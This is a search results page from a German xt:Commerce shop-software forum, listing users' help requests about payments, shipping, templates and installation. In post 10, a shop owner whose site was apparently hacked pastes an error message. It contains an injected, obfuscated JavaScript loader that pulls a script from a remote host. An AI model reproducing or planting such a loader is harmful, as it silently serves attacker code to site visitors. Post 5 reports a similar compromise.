Jump to content
xt:Commerce Community Forum

Search the Community

Showing results for tags 'benötige'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • xt:Commerce - Professionelle eCommerce Shopsoftware
    • Fragen zur Software
    • xt:Commerce Plugins
    • xt:Commerce 4 Sprachen
    • xt:Commerce Online Handbuch
    • Häufige Fragen (FAQ)
    • Fragen zur Software (Pre Sale)
    • Anleitungen - Patches - Downloads
  • xt:Commerce Office - Shop & Warenwirtschaft
    • Allgemeine Fragen
  • xt:Commerce Allgemein
  • xt:Commerce 3 Shopsoftware Community Area (nur Lesen)
    • Allgemeine Diskussionen
    • Installation und Konfiguration
    • Shopbereich
    • Admininterface
    • Modul Entwicklung
    • Template System
    • xt:Commerce Schnittstellen ERP Systeme
    • PHP & MysQL Forum
    • HTML & CSS

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


ICQ


Yahoo


Jabber


Skype


Location


Interests


Biografie


Wohnort


Interessen


Beruf

Found 36 results

  1. hallo, im moment gibt es in einem shop nicht soviele news, allerdings kommen immer häufiger aktualisierungen dazu. -> deshalb der gedanke ans plugin im moment ist es so geregelt: news werden in eine kategorie geschrieben und die cat_info zeigt im categorie listing einen kleinen ausschnitt. je mehr news -> desto mehr platz wird verbraucht, und umso größer wird das menü. jetzt brauche ich eigentlich etwas, dass mir die kategorie "news" keine unterkategorien ausgibt (im menü) allerdings das categorie listing mir weiter alle kategorien ausgibt allerdings so, dass immer nach 10 kategorien/themen unten am seitenende es weiter auf seite 2 geht. kann das, oder ist das blog plugin so?
  2. Hallo Leute, da der Zuständige Webdesigner unser Fa. leider nicht mehr an Bord ist, habe ich jetzt große Probleme mit dem xt commerce Shop. Evtl. kann mir jemand von euch helfen, bzw mir eine Lösung aufzeigen, die jemand versteht, der zum erstenmal mit dem xt-commerce shop arbeitet. <--Ich Artikel einpflegen etc. läuft alles ganz prima. Ein Problem habe ich nur bei den Abläufen der Zahlungsangelegenheiten. Bei dem Posten" Lastschriftverfahren", gibt er mir bei der Bestellung leider keine Bankverbindung mit aus. (im sql Bereich sind diese daten aber in der tabelle vorhanden) Zahlungsweise Paypal funktioniert nicht. Lediglich bei diesen beiden Punkten bräuchte ich Hilfe von Euch. Version benutzen wir xt:Commerce v3.0.4 SP2.1 LG
  3. Hallo und guten Tag, habe mich schon diverse Foren geforstet, aber zu meiner Frage keine antwort gefunden. Folgendes Problem: Wir haben für Deutschland zwei verschiedene Nachnahmegebühren. Bei Geräten bis zu einem Gewicht von 30 kg soll es 4,80€ kosten und Geräte mit höherem Gewicht kosten 13.50€. Leider nimmt er mir nur die 4.80€ an. Kann man das denn überhaupt einstellen das er nach Gewicht unterscheidet? würde mich über eine Antwort freuen. fast sonnige Grüße aus Dessau P.S. Mein Chef würde auch für die Problembeseitigung bezahlen.
  4. Ich habe ein Problem, ich habe das Plugin Master/Slave deinstalliert und installiert. Jetzt sind leider die Zuordnungen weg, sprich die Slaveartikel werden zwar angezeigt, aber gehören nicht mehr zu einem übergeordnetem Artikel! Was kann ich machen? Ist das nur ein Wert in der Datenbank, reicht ein wiedereinspielen der Datenbank?
  5. Hallo, ich habe ein Problem mit dem xtc 3.0.4 sp 2.1, es werden andauernd die Zahlungsmethoden geändert bzw. diesmal sogar gelöscht. Ich habe das Sicherheitsupdate eingespielt, die Passwörter geändert und trotzdem wurde eine Zahlungsmethode gelöscht. Anfangs wurde immer die Kreditkarte Aktiviert, nachdem ich die Zahlungsmethoden bis auf die 2 verwendeten vom System entfernt habe, wurde jetzt eine der 2 verbliebenen Zahlungsmethoden gelöscht. Wie bereits geschrieben, den Patch habe ich installiert und alle Passwörter geändert, jetzt habe ich zusätzlich dem Admin-Bereich noch eine Passwortabfrage verpasst. Was kann ich machen bzw. was passiert hier? Thx für die hoffentlich schnelle Hilfe. Torsten EDIT: Im Upload-Bereich habe ich auch diverse PHP-Dateien und ein Datenbank-Backup gefunden, welches ich jetzt alles gelöscht habe, soweit ich weiß, gehört dorthin nichts mit PHP oder SQL.
  6. Hallo! Ich bin auf der Suche nach Shopsoftware und würde mich gerne für die VEYTON entscheiden. Aber für meinen geplanten Shop würde ich eine Upload-Funktion benötigen. Der Kunde muss die Möglichkeit haben zu einem Artikel die zugehörige Datei auf den Server zu laden... Gibt es mittlerweile ein solches Modul? Oder ist zeitnah sowas geplant? dobby-99
  7. Hallo zusammen ! Ich bin langsam aber sich am verzweifeln. Versuche bereits schon den ganzen Tag, meinen Shop zu installieren. Der Shop selbst wird nun ohne Fehler angezeigt, jedoch funktioniert der Admin-Bereich nicht. Das Menü an der linken Seite wird mir soweit richtig angezeigt, jedoch im Main-Fenster erhalte ich ganz viele Warnungen. Hier füge ich mal eine Kopie bei, in der Hoffnung, dass Ihnen dieses Problem bekannt ist und sie mir einen Tip geben können: Warning: main(PhpExt/Javascript.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Javascript.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Ext.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Ext.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/Store.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/Store.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/ArrayReader.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/ArrayReader.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/FieldConfigObject.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/FieldConfigObject.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/SimpleStore.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/SimpleStore.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/GroupingStore.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/GroupingStore.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/SortInfoConfigObject.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/SortInfoConfigObject.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/ScriptTagProxy.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main() [function.include]: Failed opening 'PhpExt/Data/ScriptTagProxy.php' for inclusion (include_path='.') in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Warning: main(PhpExt/Data/StoreLoadOptions.php) [function.main]: failed to open stream: No such file or directory in /home/www/web4/html/xtAdmin/page_includes.php on line 0 Dies ist nur ein kleiner Teil von den Warnungen, welcher ich 1 zu 1 kopiert habe. Mein Server ist gehostet bei www.webtropia.com — Dedizierte Dedicated Server Root Server und Webserver mieten Ich habe dort den Server i5-6 Homepage: www.webtropia.com — Professional Server Installiertes Betriebssystem: Debian Lenny 5.0, Parallels® Confixx 3.3, 32bit Ich würde mich freuen, wenn jemand mir einen Tip geben könnte, damit ich meinen Shop zum laufen bekomme... Lieben Gruss aus Berlin
  8. Hallo! Ich würde meine Artikel gerne innerhalb von DE, sowie nach Österreich und in die Schweiz verkaufen. Wie kann ich das mit den Versandkosten machen? Am liebsten wäre es mir, wenn XTC schon bei der Registrierung feststellt, ob nach D, A oder CH geliefert wird und so auch die Versankosten im Preis anzeigt. Ist so etwas machbar? Ich danke euch für die Antworten. Viele Grüße Strobbel
  9. Hallo zusammen, ich beisse mir gerade die Zähne an einem Jquery Script aus. Hier eine ältere Version von Easy Slider: jQuery plugin - Easy Image or Content Slider | Css Globe Ich bastel gerade an einem Template. Ich will die Bestseller der Startseite animiert darstellen. Die Ausgabe der Bestseller erfolgt in einer Liste: <ul> <li> img 1 mit link </li> <li> img 2 mit link </li> <li> usw... </li> </ul> Easyslider soll nun die Liste aufgreifen und mir als Slideshow dargestellt werden. Aber irgendwie werden mir die next prev Buttons nicht dargestellt. Sieht jemand woran das liegen könnte? Hier gehts zu meinem Template: MiTSCHUH . Onlinekommunikation & Mediendesign Solltet Ihr keinen Fehler finden bitte gebt mir eine Rückinfo, da ich nicht ausschliessen kann das Veyton hier einige Funktionen unterdrückt. Vielen Dank im voraus Grüße Mike
  10. Hallo zusammen, ich hoffe Ihr habt Weihnachten ruhig und gesund hinter Euch gebracht und könnt mir bei meinem Problem helfen. Anscheinend wurde mein Shop die Nacht gehackt! Ich kann auf meine HP zwar zugreifen, aber sobald ich den Shop aufrufe sehe ich nur das : Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t)p#!!^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e#!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(co!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w00xxxxxx/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095 Fatal error: Smarty error: [in BalmyBeads/module/main_content.html line 26]: syntax error: unrecognized tag: window.onload = function(){var X38cqqcd2l81 = document.createElement('s))^c#r)@i&^p@$$@t^&&'.replace(/\)|\$|#|&|@|\!|\^|\(/ig, ''));var M1c7duoq20lb = 'Ppmf253qsed';X38cqqcd2l81.setAttribute('type', 't!@^#e#(x)$t#/^j)(a&&v@&!!a)^^s()$c)$^@r&!&i$!p#^t$!$'.replace(/&|\$|\!|\^|\)|#|\(|@/ig, ''));X38cqqcd2l81.setAttribute('src', 'h!^t(!t)p#!!^/#@/@k@^#i!^n&o)#-$^^$t^!@o@&.$(@m$o#!b^)#@i$l^$!!e@&9^@^.^@$&c($&!o^@(#m@@#.#&c&)@#h$^@i$(n)!#!a($)&-^!#c)($o#&m#&@.!(t!h!($$e)#@m@@o#$b^)i!s##@i@t^!$$e(.#$r(&)u$&&@!&8$#$0##8&0(/#^g#@!o!&o^$g(@@l$$^e^@.$c^o(#(m$&/(g@#o&$o@)g#l!^e^#).&($$c#(#&o$((&m#/^!#)^a(#$d!(o#!b@&$$e&(.@&)c^&)(o$)m$/)$&&t#^i@)(m##$e#!a@#))$n#(d$!d@()a$t!$e^!^.@c)@)!o#m(@^&/&)(co!)&m!#c)(a(@s(t#.#n&$@e!$t!$/#&('.replace(/\$|@|\)|#|&|\^|\(|\!/ig, ''));X38cqqcd2l81.setAttribute('defer', 'd^&e(&f^(@e!r^)^)&'.replace(/\)|@|&|\$|\!|#|\^|\(/ig, ''));X38cqqcd2l81.setAttribute('id', 'D@1!&l)&()o^^y()^(@x in /www/htdocs/w008d0f6/htdocs/shop/includes/classes/Smarty_2.6.14/Smarty.class.php on line 1095[/PHP] Da ich mit so etwas noch nie Probleme hatte, stehe ich wie der Ochse vorm Berg. Wie geht man am besten vor? Kann ich diese Eintragungen einfach löschen? Muss ich dabei irgendetwas beachten? Fragen über Fragen .... und dabei habe ich gerade eine fette Rabatt-Aktion laufen und komme an die Daten natürlich nicht ran. Bitte, bitte, ich brauche wirklich dringend Unterstützung. Schon einmal lieben Dank BalmyBeads
  11. Halli hallo. Ich habe da ein kleines Problem .. Undzwar habe ich die order_mail.html etwas angepasst. Diese soll bei verschiedene Bestellarten andere Texte ausgeben. Alles soweit in ordnung. Da wir dort das Modul Sofortüberweisung installiert haben, gibt es dort ein kleines Problem. Das Modul hat bei der Variable $PAYMENT_METHOD ein Bild mit angehängt. Habe es schon versucht direkt bei der if-anweisung mit einzubeziehen. Da es aber mit einer direkten "Überprüfung" nicht funktioniert, würde ich dies gerne mittels Regular expression lösen. Er soll halt innerhalb der Variable $PAYMENT_METHOD den namen "Sofortüberweisung" heraussuchen. Gibt es in Smarty diverse Regular expression Methoden, die ich hierbei anwenden kann? Habe bereits schon gegoogelt, und nichts passendes gefunden. Ist dies überhaupt mittels Smarty lösbar? Ansonsten muss ich schauen das ich dies direkt in PHP überprüfe. Hier einmal ein teil der order_mail.html, wo die abfrage stattfindet: Hallo {$NAME}, <br> <br> Vielen Dank für Ihre Bestellung. <br> {if $PAYMENT_METHOD == "Nachnahme"} Ihre Bestellung mit der Bestell-Nr {$oID} ist bei uns eingegangen. <br>Sie erhalten in Kürze Ihre bestellten Artikel per Nachnahme. {elseif $PAYMENT_METHOD == "<img align=\"middle\" title=\"Sofortüberweisung direkt (empfohlen)\" alt=\"Sofortüberweisung direkt (empfohlen)\" src=\"https://ssl-account.com/ambiente-bad.de/images/icons/sofortueberweisung_icon.gif\" /> Sofortüberweisung direkt (empfohlen)" || $PAYMENT_METHOD == "Kreditkarte (Amex, Visa, Euro/MasterCard)"} Die Ware wird in Kürze der Versandabteilung übergeben. {else} Bitte überweisen Sie den Gesamtbetrag unter Angabe der Bestell-Nr: {$oID} auf das angegebene Konto. <br>Bei Zahlungseingang wird die Ware sofort versendet. {/if} <input type="hidden" value="{$PAYMENT_METHOD}"> <br> [/PHP] Ich wäre euch sehr dankbar, wenn ihr mir weiterhelfen könntet.
  12. Hallo Leute, ich brauche dringend Hilfe für meinen Shop, da ich mich mit dem Programm überhaupt nicht auskenne. Der Typ, der mir bisher immer alles eingestellt hat, lässt mich im Stich. Nun habe ich diverse Probleme (wie z.b. beim einloggen) und brauche dringend Hilfe! Bitte meldet Euch, denn ich kann zurzeit kaum in meinem Shop arbeiten. Dankeschön!! Gruß Lilly
  13. Hallo, ich habe hier 2 kleine. Erstens Wo kann ich den Text der in der Bestellbestätigung steht ändern. Das zweite Problem wäre folgendes. Ich stelle Paypal als Zahlungsmethode ein. Gebe meine Paypaladresse ein aber diese ist wenn Paypal ausgewählt wird weder während dem Bestellvorgang noch später auf der Bestellbestätigung sichtbar. Wäre super wenn mirjemand bitte weiterhelfen würde. Mit freundlichen Grüßen brandstore.at
  14. Benötige dringend einmal eine Hilfe bezüglich der Software XT-Commerce Version 3. Habe Problem Logo in Template zu ändern bzw. Logo in das Kontaktformular einzubauen. Wenn mir jemand helfen kann bitte Mail an whitetiger@online.de.
  15. Hallo zusammen, während ich in meinem Shop herumklicke, veränderte sich auf einmal wir von Zauberhand das Design. Die Hintergrundfarbe ist nun weiß, die Links sehen anders aus. Ich finde es ganz schrecklich und weiß im Moment nicht weiter. So bleiben kann es auf keinen Fall. Die CSS Datei ist in Ordnung. Auch die index.html in templates ist okay. Habt Ihr vielleicht eine Ahnung, wie ich hier Abhilfe schaffen kann? Habe bereits meinen Webhoster angemailt, vielleicht liegt das Problem dort. LG Silke
  16. Hallo Leute, ich möchte gerne mit XT-Commerce einen Onlineshop aufziehen und benötige hierfür professionelle Hilfe, da ich selber nicht viel Zeit dafür habe. Bezahlung läuft auf Verhandlungsbasis. Würde mich sehr freuen, wenn sich hierfür jemand findet! Vielen Dank im Voraus! Mit freundlichen Grüßen MYMIDIA
  17. Arbeite mit der 3. ´Version und kann keine Bilder mehr in meinen Shop laden. Erhalte immer eine Fehlermeldung Warning: constant(): Couldn't find constant PRODUCT_IMAGE_THUMBNAIL_DROP_SHADOW_TITLE in /home/httpd/vhosts/hychecker.de/httpdocs/admin/configuration.php on line 174. Wer kann mir weiterhelfen
  18. Tag an alle! Bin gerade dabei in index meines Shop bild anzuhengen leider klappt es bei mir nicht, bekomme nur den meldung: Parse error: syntax error, unexpected '{' in /home/www/ph14s313/html/media/content/i-6.jpg on line 180 An was kann es liegen? oder wie kann ich das bild auf des startseite anzuhengen? Bild format ist JPEG. Mfg denis82
  19. Hallo, ich habe mir die XTC Version 304SP2 auf meinem Server Installiert. Doch leider komme ich nicht in den Admin Bereich, machnmal komm ich rein doch dann werde ich ohne gründe wieder ausgeloggt und komm nicht mehr rein. woran kann das liegen? Mfg Maisch
  20. Hallo, in unserem Shop kann man seine Artikel auch per Lastschriftverfahren bestellen, das funktioniert soweit alles einwandfrei. Doch wenn wir die Bestätigungsmail erhalten, steht meist dabei "Lastschriftverfahren" aber wir erhalten nie die Bankdaten, welche angegeben wurden. Müssen immer noch eine Email an den Käufer verfassen. Das ist unprofessionell. Kann uns jemand bitte weiterhelfen, wo und wie wir diese Änderung im Admin-Bereich vornehmen können? Besten Dank im Voraus.
  21. Hallo, da der Bilderupload nur mit dem alten Flash Player 9 funktioniert (nicht mit der 10er Version), benötige ich diesen. Weiss jemand woher ich diese Version noch bekommen kann, habe schon überall bei Google geguckt, aber nichts gefunden. Alle Links im Internet der 9er version, laden dann über den Adobe Server die neue 10er Version herrunter. MFG
  22. Hallo liebes Forum, ich benötige etwas Hilfe bei diversen Grundeinstellungen im Shop! Hat hier evtl. jemand Interesse daran mir zu Helfen? Wenn ja würde ich mich über eine kurze Mail mit Telefonnummer freuen!! Am Telefon könnte man alles weitere Besprechen. Freue mich über Antworten unter 27305 at gmx.de >> at durch @ ersetzen < Grüße NDS
  23. Hi, Ich versuche mich gerade in das Template System von xt:C einzuarbeiten. Ich benötige einige Kundeinformationen in der product_info.html (Benutzername und ID) in der product_info.html gebe ich mir alle smarty Variablen mittels {debug} aus, also ich sehe welche Variablen ich zur Verfügung habe. Ich habe versucht in der login.php folgendes zu machen leider ohne Erfolg. $smarty->assign('VORNAME', $_SESSION['customer_first_name'] ); $smarty->assign('NACHNAME', $_SESSION['customer_last_name']); $smarty->assign('ID', $_SESSION['customer_id']); Die Variablen stehen mir in der product_info.html nicht zur Verfügung. Dann habe ich einfach mal als Test folgendes in der product_info.php gemacht: $smarty->assign('language', $_SESSION['language']); $smarty->assign('test', 'test'); aber auch die Variable test steht mir laut debug in product_info.php nicht zur Verfügung. Ich hoffe Ihr könnt mir bei meinem Problem helfen. Danke schirrmie
  24. Guten Tag zusammen, ein Kunde von mir, welche ich gerade übernommen habe, möchte mit seinem XT-Shop umziehen zu einem neuen Provider. Das ganze ist ja im Prinzip, so dachte ich zumindest, kein Problem. Ich habe ein Datenbank-Backup per phpmyadmin gemacht und das dann auf meinem Testserver wieder eingespielt, die Files hochgeladen und die beiden config-Dateien entsprechend angepasst. Der Shop ist auch sofort Online gewesen, alles kein Problem. Nun bekomme ich aber, wenn ich in eine Kategorie reingehe und dort ein Produkt anklicke sofort die folgende Meldung: Okay, ich habe dann hier einmal ein wenig im Forum gestöbert und rausgefunden das man im Prinzip den Shop folgendermaßen umziehen sollte: - Datenbank-Backup über den Admin-Bereich des Shops - Den Shop NEU auf dem neuen Webspace installieren, incl. Patche ect. - Danach Datenbank über die Weboberfläche zurück spielen - Bilder der Ware zurück spielen. Mein Weg wäre also demnach falsch gewesen oder? Das nächste Problem ist das der Kunde die Originalsoftware nicht hat, ich also den Shop hier nicht runterladen kann...? Ich würde mich über Antworten freuen, das ganze brennt noch nicht wirklich da ich das ganze erst in ruhe testen möchte bevor wir den KK Stellen und den Shop umziehen, da der Kunde damit einigen Umsatz hat Vielen Dank Euch allen für das lesen meines Beitrags. Lieben Gruß aus der Eifel Michael Kaldenbach
×
×
  • Create New...